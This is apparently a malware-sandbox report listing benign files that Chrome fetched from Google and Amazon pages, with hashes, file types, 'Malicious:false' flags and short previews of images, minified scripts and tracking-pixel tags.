                                                                                                                                                                          Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5.......................................................................|.D..~..........#1...:.L...X.7v3E............|*.3#].........UlV.#rs...v.............zF.,w.".....lno.....Vr...l:/...N.a........~...O..zS9....:.........).J.~d...(........G...+......'..s.k._[...^..^..n.Y.5&.....>...n.Z..y...o...Ob....y{..Nt4..0..............@............................!1AQ."02aq..@RrBb.......$6CDsu............?......?%..gn....Y..l...k.>\.S/.!.......B...#..x..0=.....R.d8..Gt....A.....~..p..-...Z....O.~.8.,..P.SJ..W...iWP..g.p~I.,..#.....2.l..>>.rj."I.D..].*`.*q .E$.......>S.E..,...d..N.U.....%0R..]R.....W.A....r$..H.Y)...~...[...2.......V....9......r.W%y..U:.`..,....N.Tn...o....x.9h..70..qQ-.K].4.S..Tv8..C....X5.y......+...((+....;..G.k...H"......5...4..#.P...........m.i..w.....&..no....p.%@
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1921
                                                                                                                                                                          Entropy (8bit):7.700924191769921
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:14A9590A6F74261E30CF769FA24A369C
                                                                                                                                                                          SHA1:8272795EDCD4D83539BCBC6E19F6DF442D2567F5
                                                                                                                                                                          SHA-256:C4604DFBCBA33A0A037C81EED49EBAD061A7D104D8897E7EF9F881517A04CF27
                                                                                                                                                                          SHA-512:750BDA44D6BB6482BBE102640D1834161BE40E690804BBE60A3856AFC40B307FB56E4CB1D1AB34D8EFFC9AA2301A3873CDBCBCB97B0220267DD01CB2BB16EDDC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x.....................................................!1.AQ."..2aqR.b....$r........................................................?...................]S.dl&V...e.=..\..................+=..K..jn5......q....;...=a.\.|.2...!..lc..|..mh>......!.....fw.3.}.....%.f.I;g|...~..<..7..r.D..b..f7.z.......ml^.7_..`.JZh.q.NyQ....T._X.RY^...n...N....;..X&.M..O.%4.1|.Xi,..`9....K^.=.....395l..v+b.........D@DD.]$..frP?.ub.Y...1....y....8.....ER..).L]..U............0.....U..,......l.........A.4.z=Y../!..'3.............X.]4.l.y1.,...e..3WZ.y..V8 s..Pf..Kr.o...4.g5..i.Q.=r..V[.~..9.2...{...`.M.../*y..*/...k...<m.=(..w..h..'....@DD......**$lQF3t.:Z..)...K-....S..$o.M......_.(f.Z.N..Q1.~.1.y...4.t...F.....f...j...TW..n..{Oc.].*....)..u>.~....wV"Tt.4..1Fu._O.=X%..h..|g...k_r.T.ki.....UHu4...9...........
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (594)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1671
                                                                                                                                                                          Entropy (8bit):5.28047730333183
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:F9135AA1F185C27B6FC92E32B0BD2576
                                                                                                                                                                          SHA1:EE2BDAB71375B0F033B964010A284A6A696FF30A
                                                                                                                                                                          SHA-256:1ED9B9EDC7BA0AC0EB96B023488AF49431BA73790617A51F74665DD63F3255F5
                                                                                                                                                                          SHA-512:8A7F5B54494E37525964AD08C59BFA1E5A289FC6552FDDCA939444D0147690BD4A5CBBD7195B1AA7F15DDDC409A97E8772D608A48AB275E77A183A19F56AA653
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.x("kMFpHd");._.wab=new _.Ld(_.iKa);._.y();.}catch(e){_._DumpException(e)}.try{.var Hab;_.Iab=function(a,b,c,d,e){this.iGa=a;this.vpd=b;this.jmb=c;this.dvd=d;this.rHd=e;this.bdb=0;this.imb=Hab(this)};Hab=function(a){return Math.random()*Math.min(a.vpd*Math.pow(a.jmb,a.bdb),a.dvd)};_.Iab.prototype.e4b=function(){return this.bdb};_.Iab.prototype.hla=function(a){return this.bdb>=this.iGa?!1:a!=null?!!this.rHd[a]:!0};_.Jab=function(a){if(!a.hla())throw Error("we`"+a.iGa);++a.bdb;a.imb=Hab(a)};.}catch(e){_._DumpException(e)}.try{._.x("bm51tf");.var Kab=function(a){var b={};_.Ha(a.utb(),function(e){b[e]=!0});var c=a.qsb(),d=a.Fsb();return new _.Iab(a.Esb(),c.oa()*1E3,a.bjb(),d.oa()*1E3,b)},Lab=!!(_.Tg[28]&512);var Mab=function(a){_.wn.call(this,a.Oa);this.Kg=null;this.Ba=a.service.fEb;this.Ca=a.service.metadata;a=a.service.Xed;this.oa=a.fetch.bind(a)};_.D(Mab,_.wn);Mab.Ta=_.wn.Ta;Mab.Ja=function(){return{service:{fEb:_.Cab,metadata:_.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):5489
                                                                                                                                                                          Entropy (8bit):7.902592051364979
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:8F6817C176E1D256151AB54BCEC8D786
                                                                                                                                                                          SHA1:3AD131A7B95C1F42895BCC34110BB3EDF15312A8
                                                                                                                                                                          SHA-256:B70C72702FD6D35A7F1AE4AEA9D8E3F8EF4BFCD76F033121E7963E3EEA0B01B0
                                                                                                                                                                          SHA-512:1E230E32CF6F8535EA452C398EA3667248B3F500BBC9022CF23949AF08E0FF308CAA6440A566ECB35265FFC1DDFF3AD340485C032EB4CDF29A8BBB796586F404
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-N2E2MjFhMzQt-w186._SY116_CB412108494_.jpg
                                                                                                                                                                          Preview:......JFIF.............C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......t....".........................................I............................!1Qa.."A.#23bq....5Vrst...BR...&6CFTcd.....................................<..........................!.1Q."A#2Baq.....Rbc...%5DSrs...............?...)JR.\..p..7[W.L.T..!JZ.......0...N.J.... P.F.}U..Vf8.=.o....H+)Y.......`c..5.....Skcc.....6......*.R...v^?.....o...*....X.{..#..~d.....aV..^...$.bF>...G....i...h3X..?.k4.e..[q..B..*....P`..i..C[......6....-....d1w.../b..6.`..H..R..)JR..)JR..)JR..)JR..T.#..C.w;....|..}.#.]....9NM[Bp..S.p.6.M.4.J.)....:;}.U.t7.K"''.....W.91.".v.816..C..,.........:......N..JMe".`*k..G.....v....P.Y.t.'$..S.'......*...u.......E.....5..|.....mo,.sr..q[...>..M..Gk........c._...N. .U...@w.c...Myj.#b6.E.H..#..L..,.N....V..S..E]q...i[M+..:..R4......b.<.,n.6.PV<...].Bu..(.~.}..jm..p^Y.4..|.W.d.]C.../.}*.....Mw
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                          Entropy (8bit):7.8938748179764
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6282A05D151E7D0446C655D1892475E2
                                                                                                                                                                          SHA1:B2B05F319DA0E73250200AE9BB518A318D6B4C5D
                                                                                                                                                                          SHA-256:4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
                                                                                                                                                                          SHA-512:DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
                                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).*....q....\....9B>...)>#2...A....z..8.#+A.V-..h*h....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[.....*.w...&K..$..K..\.t..QoY..O?....u.Sa.*-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.*....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:*.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P|[....R].m,.......Z..Pk.g0.yl...Z.qp..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (738)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):29466
                                                                                                                                                                          Entropy (8bit):5.407006423310801
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:33B5E9397A36BFB09D35DD9127111F45
                                                                                                                                                                          SHA1:E424C8A4F7AE57175B5ED6698E210DCC21F207DF
                                                                                                                                                                          SHA-256:8A2D14D09836D16D1B910873D609921323FFA54BC61143C10AA9269D9DDA828E
                                                                                                                                                                          SHA-512:6958BBA28243637A562333D21E4C5A0A73C93D2D02D099B0385F5ECE4450AB94195D10569A803CD968B063388DD8A4DF85179E45BC715465BD2E92B5E898A0DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.hd.en.eJLXiQqXlJU.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAACAEKAAAABQAAAAAAAAAAAAAAAAQIAQBEAQAAAgA4AAAEAQAEABAQAAAIEATgUSYAgAAwAQAAAAAQAAACQAAACAAAAAMAACAAAAAAAKAAAAAAAAAAAAAAAAAAwAACCAAAAAAAAAAAAAABAAAAQAcAAAAAAAEAAAEBADBABhAAAAgAAABAHwAED4BBCgsAAAAAAAAAAAAAAAQgQTAXElAQgAAAAAAAAAAAAAAAAABISRMXNg/d=0/dg=0/br=1/rs=ACT90oHid0j0ga0yFcae2fYObZ-YQ7gzFw/m=syuy,syux,VsqSCc,sy1g0,P10Owf,sy1es,sy1eq,syr9,gSZvdb,syzw,syzv,WlNQGd,syre,syrb,syra,syr8,DPreE,sy108,sy106,nabPbb,syzq,syzo,syju,sykz,CnSW2d,kQvlef,sy107,fXO0xe?xjs=s4"
                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.qNb=_.Dd("VsqSCc",[]);.}catch(e){_._DumpException(e)}.try{.var lNb;_.nNb=function(a){return lNb("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.mNb(a),hashtag:"#GoogleDoodle"})};_.oNb=function(a){return lNb("https://twitter.com/intent/tweet",{text:a})};_.pNb=function(a,b){return lNb("mailto:",{subject:a,body:b})};_.mNb=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};lNb=function(a,b){var c=new _.Om,d;for(d in b)c.add(d,b[d]);a=new _.Gm(a);_.Mm(a,c);return a.toString()};.}catch(e){_._DumpException(e)}.try{._.x("VsqSCc");.var rNb=function(a){1!=a.qAb&&_.Gcb(a,!0)},sNb=function(a){a.VRb=!1;_.adb(a,!1)},tNb=function(){_.xk.call(this);var a=this;this.dialog=new _.ir("ddlshare-dialog");this.dialog.GXa(!1);_.Tcb(this.dialog,!0);this.dialog.Vjb=!0;_.Scb(this.dialog);rNb(this.dialog);sNb(this.dialog);_.Ucb(this.dialog,.95);this.Id=new _.om(this);this.oa=new _.xOa;_.ke("ddle","0",!0);_.he("dd
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (415)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):763
                                                                                                                                                                          Entropy (8bit):5.363139551721995
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:83843E897CC63E906B88E7FF4657680E
                                                                                                                                                                          SHA1:F9E289AD05108446BFC1D485C0B6FF126E40395E
                                                                                                                                                                          SHA-256:96568882FFD880EB0F7EC6FBC886EFC10B6DB7A6A52E8FA531C59566108CE007
                                                                                                                                                                          SHA-512:676C7F404807D5291B0F098F1DECB76968034C872C260369A10E2BB4B764BEF53E694F01B0780F03494002EE63C67C713D88DC252FC4A7C6D27341EE8C085760
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:<img style='display:none' src='https://aax-eu.amazon-adsystem.com/s/dcm?pid=cda341cb-196c-4da8-897b-752ce4bb588d&id=97bcb2c9-b94b-417d-750b-13424e0fc1ca&env=mWeb&eventType=map&id_mid_4=97bcb2c9-b94b-417d-750b-13424e0fc1ca&id_mid_61=97bcb2c9-b94b-417d-750b-13424e0fc1ca&reqId=99e5b829-c31e-4959-5877-5f039f8b633b&zdid=1353&zurl=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dzeotap%26id%3D%7BZCOOKIE%7D'>.<img style='display:none' src='https://mwzeom.zeotap.com/mw?zpartnerid=1353&env=mWeb&env=mWeb&eventType=map&id_mid_4=97bcb2c9-b94b-417d-750b-13424e0fc1ca&id_mid_61=97bcb2c9-b94b-417d-750b-13424e0fc1ca&reqId=99e5b829-c31e-4959-5877-5f039f8b633b&zdid=1353&zurl=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dzeotap%26id%3D%7BZCOOKIE%7D'>
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (3521)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35620
                                                                                                                                                                          Entropy (8bit):5.4997614676657145
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:81A1D8FA5C04F07891160FE99E8546ED
                                                                                                                                                                          SHA1:02F7324380B7584D6ACCF1831DDE1F7A9D2D2996
                                                                                                                                                                          SHA-256:9565D0D726F1E164B327E410D5584DE367D8B2DECFEFB52D3D347349B4C4D113
                                                                                                                                                                          SHA-512:F59599729DC0E87D84CB7A55C50537067CF0416739A41D59A93E0F3D4D63C2B000FA1C2EF8EFE0AFB1E3953753F24AD1309412E099EA2039D8119E4AE346BE78
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.aC=new Set([1]);_.Qga=new Set;._.GD=new _.qn("NDUxjd");_.HD=new _.qn("maEyc");_.ID=new _.qn("XOk3ab");.var Kha,Mha,Nha,YE,ZE,iF,lF,qF,rF,oF,Pha,pF,sF,uF;Kha=function(a){return _.ic(a,!1,!1,!1)};.Mha=function(a,b){b=b===void 0?UE:b;if(!VE){var c;a=(c=a.navigator)==null?void 0:c.userAgentData;if(!a||typeof a.getHighEntropyValues!=="function"||a.brands&&typeof a.brands.map!=="function")return Promise.reject(Error("lc"));c=(a.brands||[]).map(function(e){var f=new WE;f=_.ll(f,1,e.brand);return _.ll(f,2,e.version)});Lha(_.il(_.SE,2,a.mobile),c);VE=a.getHighEntropyValues(b)}var d=new Set(b);return VE.then(function(e){var f=_.SE.clone();d.has("platform")&&_.ll(f,3,e.platform);d.has("platformVersion")&&._.ll(f,4,e.platformVersion);d.has("architecture")&&_.ll(f,5,e.architecture);d.has("model")&&_.ll(f,6,e.model);d.has("uaFullVersion")&&_.ll(f,7,e.uaFullVersion);return f}).catch(fun
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):444054
                                                                                                                                                                          Entropy (8bit):5.609554969852667
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:381B551B42E02BDF3476FAE1E0FA7145
                                                                                                                                                                          SHA1:E9256B4C91BB89942B02737C03922160D7A66C48
                                                                                                                                                                          SHA-256:93C8ABC72F89DDF494164121D703B7A3018E399760B8597466438FC7CAFB4781
                                                                                                                                                                          SHA-512:9A623CAF900105F4DDF8655EC35059DED6226A46915F4FBD8F24A975ED12A68720151474E1A1790BFAF97816A19CEAFB4744590C0B281BC105A4368E5BA474F6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                          Entropy (8bit):3.625
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:BCE74A066E68DD96B3B2540376EC6DBC
                                                                                                                                                                          SHA1:A28403B9557EE9ADA5CEF53311CDBA6B9444F9B3
                                                                                                                                                                          SHA-256:3A1428F58A249E270186BCACA0B75F8B2BCC42324D711107791A9A343BD76BEA
                                                                                                                                                                          SHA-512:F15FBF182BEF4B1AB4CE14E4660EE346746AE1955164F4686B73DA2A57959DB44464DD309D2C6D7A2722B5481BA25E6735C1337C48251BD60EBEC207F77F2566
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAmh5FqHx8BsgBIFDaqWrfY=?alt=proto
                                                                                                                                                                          Preview:CgkKBw2qlq32GgA=
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2140
                                                                                                                                                                          Entropy (8bit):7.681064331721705
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:40DFFE0C2A79542E7871C214C83B9389
                                                                                                                                                                          SHA1:8B7180263F4ADEBD0229A7CA24F058804E014EF8
                                                                                                                                                                          SHA-256:99FFE00914EC7C4911807777D032D34E7FCF0DB31E86BEDB7A90E7150CFE2D85
                                                                                                                                                                          SHA-512:C8636B35DF266BDB5CAA6FDDC60A91F7D27623EB74305850394BA17965AF1DE632C4F9B7ACC4BF51B5980E6FE2000B92414BEBE68FC92BD5A968D7FAE38CBED7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...................................................................................W.*...+B..X."e...l.......5...o|=.+....n...m.5........k.*....y~xKW..G..O.g.........d..j.Z.....-.z..?.2.l|.>.(....O.03.~`...r.eg..>...<.%.-.fU..M=..<}........fQ..{.A.8....N......t..o2......]t....<....<..............N...........................!t.."%12@Qq.$0A.......#456ars.......&37CPRSVcdu..........?...V...0.nrFi.y..9..l.w.#(...S."....2.aJ+1.....1.|M....j5y...Oua..8......5..1...S..BO.2.....m..j8..S.}..M-.%n.s..q.h.>9.U..Y..V..}.Z.2..(8..3.r.[3.J<..iv.[P..a.2C.h.~.77W.zXv....Y...Ur:3!..`..y....i7qE.R.:M..<..-<...q.hX.....9.P....Q..TP.t.-..Q`>,..J.......C.R...LT.*.......P=..Ll.g.Sj.(..vLa....^....]9...B.!m>.v7.......1>.5LZ_w+..]...&....?.s`........9.Q..b.NW`.....[{0...j...=cT^..=...Qc`s<........Q.k.u...+I..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (521)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1573
                                                                                                                                                                          Entropy (8bit):5.1232162830238845
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:94076971E3EB030E38FF9F7949188CB2
                                                                                                                                                                          SHA1:D6297DF4459CF960DD91EB3F5E529EF5D553866E
                                                                                                                                                                          SHA-256:B845C064BC7BC4E5553937C670FCD86B0B3131C073B82411EE55B2C867F66154
                                                                                                                                                                          SHA-512:7C5A2C8442CB84E2F0628DAFF66D60048792CAE33E2B7B933FF0405AC909CBD6AE84EFA4F46D5596F81A44C3B5A6CDFF2B440AD84159757951D45999243F3F70
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.Lpb=function(a){this.Bu=a};.}catch(e){_._DumpException(e)}.try{._.x("aLUfP");.var Mpb=function(a){_.wn.call(this,a.Oa);var b=this;this.window=a.service.window.get();this.Ba=this.Bu();this.Aa=window.orientation;this.oa=function(){var c=b.Bu(),d=b.NYa()&&Math.abs(window.orientation)===90&&b.Aa===-1*window.orientation;b.Aa=window.orientation;if(c!==b.Ba||d){b.Ba=c;d=_.Pa(b.Sd);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new _.Lpb(c);try{e(f)}catch(g){_.ca(g)}}}};this.Sd=new Set;this.window.addEventListener("resize",this.oa);this.NYa()&&this.window.addEventListener("orientationchange",.this.oa)};_.D(Mpb,_.wn);Mpb.Ta=_.wn.Ta;Mpb.Ja=function(){return{service:{window:_.xn}}};_.m=Mpb.prototype;_.m.addListener=function(a){this.Sd.add(a)};_.m.removeListener=function(a){this.Sd.delete(a)};._.m.Bu=function(){if(_.la()&&_.ja()&&!navigator.userAgent.includes("GSA")){var a=_.nl(this.window);a=new _.Xk(a.width,Math.round(a.width*thi
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):278379
                                                                                                                                                                          Entropy (8bit):5.639022649099279
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:23FDBECEE1BA260E4B8BD80948E8CE67
                                                                                                                                                                          SHA1:FC39611384ED2DB118EFB8EF83B34AFC6D1C8C61
                                                                                                                                                                          SHA-256:B11DD3564C5B2CBDA06B1C47C4946102DE5D1F69125E80579D04F2AD90BF111D
                                                                                                                                                                          SHA-512:63F20E83432B44830954E9B3A4335B13016F41801956C332C929652490F94546DAFD5B77C2C898513BEEF03AC3F49565D715E48AC46C76EB20E29F80C9D8CA1A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.amazon.ae/
                                                                                                                                                                          Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (595)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):52976
                                                                                                                                                                          Entropy (8bit):5.315043781142496
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                          SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                          SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                          SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild
                                                                                                                                                                          Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3074
                                                                                                                                                                          Entropy (8bit):7.83168622931748
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:03A1E6BD27F1F0EE6F673E1384FEEEE3
                                                                                                                                                                          SHA1:36E6DB4C9A3EB3DAED2CD0A4CB72573EC206A430
                                                                                                                                                                          SHA-256:24E385436008D2B84398C2D0659E8211900DC31714CA841F5B5ED0043C91D8F7
